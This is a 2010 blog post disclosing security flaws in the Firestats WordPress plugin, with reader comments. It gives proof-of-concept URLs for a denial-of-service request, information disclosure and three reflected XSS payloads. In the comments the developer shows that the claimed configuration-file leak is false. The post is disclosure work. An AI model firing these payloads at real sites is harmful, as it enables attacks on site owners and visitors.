Go beyond the impossible!
More 0day wordpress security leaks in firestats!
I just tried to find more security leaks in the firestats plugin, I was specifically searching for remotely exploitable problems.
The results are 7 fresh security issues.
1x DoS:
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1
1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).
/wp-content/plugins/firestats/php/tools/get_config.php
2x Information disclosue:
/wp-content/plugins/firestats/php/page-sites.php /wp-content/plugins/firestats/php/page-tools.php
3x XSS:
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
Let’s hope they patch soon because we are running Firestats too, the previous fix came very fast so I assume they will fix it this time fast too.
Oh and feel free to test the exploits against this site (but don’t try out the DoS please).
Good luck Firestats team with fixing these vulnerabilities!
| Print article | This entry was posted by Jelmer de Hen on 09/07/2010 at 20:28, and is filed under Critical, Web Security. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |
about 1 month ago
nice find ..hope they fix it soon
about 1 month ago
The most significant thing is of course the configuration file download, however it’s totally false.
see if you can get my config file from here:
http://admin.firestats.cc/firestats/php/tools/get_config.php
this php script is designed to generate a config file on demand, not to give the current one.
for instance, here is the config file of Bill Gates:
http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!
about 1 month ago
You are right; I looked at the code but I could not find anything worthy.
Why would you have this function in Firestats, it’s pretty pointless I think.
about 1 month ago
I am sure you can figure it out, if not – look at the comment in the new version of the file
about 1 month ago
it was very interesting to read.
I want to quote your post in my blog. It can?
And you et an account on Twitter?
about 1 month ago
Yea you may quote our blog, my personal twitter is http://twitter.com/JelmerDeHen and for the entire blog where you automatically get updates as we update the site is http://twitter.com/HackAck. Feel free to follow us
.
about 1 week ago
I love what you men are usually up too. This kind of clever work and reporting! Keep up the great functions guys I’ ve added you men to my blogroll, Cheers.